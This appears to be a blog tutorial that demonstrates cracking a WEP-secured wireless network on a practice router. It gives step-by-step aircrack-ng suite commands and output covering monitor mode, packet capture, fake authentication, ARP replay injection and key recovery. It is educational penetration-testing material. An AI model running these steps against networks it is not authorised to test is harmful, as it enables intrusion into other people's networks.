Wireless Security

Wired Equivalent Privacy (WEP) was introduced in 1999 as a part of 802.11 standard. It's puprose was to assure the privacy of the wireless network in a way near to wired networks. It's using RC4 cipher (with different key size: 64 and 128 bits) and CRC-32 checksum to mantain integrity. In addition WEP is using a short, 24 bit initialization vector (IV), which is added to the key provided by user, creating 'unique' for each packet RC4 key. But because the IV is so short, and it's used with the same key, WEP is now considered outdated, easy to crack and insecure.


Step by step attack

Firstly we need to setup an old router, with WEP security option enabled, which will be our practice target. Also remember to have some other device connected to it wirelessly since we'll need to capture encrypted data between them. After that check whether or not your wireless card supports packet injection - if not, you have to get another one. I'm using TL-WN722N which is great and cheap option. Now, if you have everything up and running - let's move to Kali.

Firstly let's check if your adapter is seen by Kali - you can do this by typing airmon-ng command.

[email protected]:~# airmon-ng

PHY Interface Driver Chipset

phy0 wlan0 b43 Broadcom on bcma bus, information limited
phy1 wlan1 ath9k_htc Atheros Communications, Inc. AR9271 802.11n

For me it shows two cards - built in and USB one which is wlan1

Now type airmon-ng start [interface] to set your USB adapter into monitor mode. If you encounter any problem try using airmon-ng check kill which will kill any processes using this adapter. After that I checked what name was assigned to the adapter - for me it was wlan1mon but yours can be different.

[email protected]:~# airmon-ng start wlan1

PHY Interface Driver Chipset

phy0 wlan0 b43 Broadcom on bcma bus, information limited
phy1 wlan1 ath9k_htc Atheros Communications, Inc. AR9271 802.11n

(mac80211 monitor mode vif enabled for [phy1]wlan1 on [phy1]wlan1mon)
(mac80211 station mode vif disabled for [phy1]wlan1)

[email protected]:~# ifconfig
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet netmask
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 0 (Local Loopback)
RX packets 2200 bytes 150212 (146.6 KiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 2200 bytes 150212 (146.6 KiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

wlan1mon: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
unspec F4-F2-6D-1A-99-ED-00-00-00-00-00-00-00-00-00-00 txqueuelen 1000

Next step is to find the router - and get it's BSSID, channel (CH) and ESSID. You can do this by running command airodump-ng [interface]. This will show list of routers in range, information we need and some additional data.

[email protected]:~# airodump-ng wlan1mon

18:21:95:90:46:45 -86 2 0 0 1 54e. WPA2 CCMP PSK AndroidAP
54:B8:0A:10:DF:0E -42 34 0 0 1 54e WEP WEP pentest_wep
D2:AE:EC:CE:DB:3B -76 10 0 0 1 54e WPA2 CCMP PSK DIRECT-mi pass-PHILIPS TV

BSSID STATION PWR Rate Lost Frames Probe

00:27:22:2A:9C:0E 00:27:22:06:83:C3 -83 0 - 0 50 49
C4:27:95:75:3E:45 10:30:47:E3:43:F5 -67 0 -11e 0 2

Here it is, we've got all information to start the attack. My target is pentest_wep with BSSID:54:B8:0A:10:DF:0E on channel 1. Copy the essential information and open another terminal window (CTR + ALT + T). Now we're going to capture encrypted packets sent between the router and client device. We can do this with airodump-ng command.

[email protected]:~# airodump-ng -w pentest_wep -c 1 --bssid 54:B8:0A:10:DF:0 wlan1mon

Explanation: -w will save the packets to the file called pentest_wep, -c is a channel that the target is using, and --bssid is to specify which router we're going to attack. Last thing is to choose the USB adapter running monitor mode.

That's what we're going to be shown after running this command.

CH  1 ][ Elapsed: 32 s ][ 20016-09-25 10:16                                         


54:B8:0A:10:DF:0E 218 100 312 1927 223 1 54 . WEP WEP pentest_wep

BSSID STATION PWR Rate Lost Packets Probe

00:A0:37:C3:D1:CB 06:19:E0:88:6A:4C 170 0-24 1005 16

As you can see we've got a few more information - number of beacons, data sent, packets, and data per second. These numbers will start at 0 and grow as the traffic is passed between the router and client device. Then this traffic is saved into the file, specified in the command argument, which we're going to use later in order to crack the password. But to make it work you will need at least 20,000 IV's, sometimes even more. I recommend you to 'harvest' around 100,000 as it will undoubtedly work. At this point you can wait until you get desired number of IV's. But what if the target isn't using internet at the time? What if he/she's sleeping? Yup, there's solution to this ;)

Open up another terminal window (remember not to close the one running airodump-ng) and type in this command aireplay-ng -1 0 -a [BSSID] [interface]

[email protected]:~# aireplay-ng -1 0 -a 54:B8:0A:10:DF:0E wlan1mon
No source MAC (-h) specified. Using the device MAC (F4:F2:6D:1A:99:ED)
08:05:38 Waiting for beacon frame (BSSID: 54:B8:0A:10:DF:0E) on channel 1

08:05:38 Sending Authentication Request (Open System) [ACK]
08:05:38 Authentication successful
08:05:38 Sending Association Request [ACK]
08:05:38 Association successful :-) (AID: 1)

After that run another command aireplay-ng -1 0 -a [BSSID] [interface]

[email protected]:~# aireplay-ng -3 -b 54:B8:0A:10:DF:0E wlan1mon

Aireplay-ng works by sending ARP request packets so that data and beacons should start growing quickly. This works even if no one is connected to the internet.

Now after we've already captured huge amount of packets close all the processes that were running, then type ls to see if the .cap file was saved. Then we can type aircrack-ng [filename.cap]. This will start the process of cracking the password. Attack will be restarted between every 5000 IV's.

[email protected]:~# aircrack-ng pentest_wep-01.cap
Opening pentest_wep-01.cap
Read 1894984 packets.

# BSSID ESSID Encryption

1 54:B8:0A:10:DF:0E pentest_wep WEP (9651 IVs)

Choosing first network as target.

Opening pentest_wep-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 9651 ivs.

Aircrack-ng 1.2 rc3

[00:32:05] Tested 1972 keys (got 24276 IVs)

KB depth byte(vote)
0 4/ 8 42(30720) 30(29696) B0(29696) 68(29184) 0E(28160)
1 0/ 1 31(34304) 0A(30720) 0F(29952) 35(29952) E9(29952)
2 2/ 5 0F(29696) A1(29440) CA(29440) CB(28928) F7(28928)
3 2/ 6 68(30720) 15(30464) 89(29696) E1(29696) 5F(29184)
4 8/ 9 92(29696) 9C(28928) B5(28928) 64(28672) 8F(28672)

KEY FOUND! [ 42:31:57:68:92 ]
Decrypted correctly: 100%

And we've got the key! Some versions of aircrack may show you also ASCII version of the key but both can be used to login into the wireless network. Notice that you can run aircrack at the same time as running airodump - that way it tries to crack the key every time you gather new 5000 IV's.

Notice how easy it was to gain access to the network protected with WEP? That's why you should never protect your network with this standard.

As always thanks for reading, keep tuned for the next part about more advanced algorithms like WPA or WPA2. I also really recommend trying it out by yourself as it's the best way to understand how it works and learning by practicing is the best way to gain knowledge.

Keep learning and stay safe! ~ W3ndige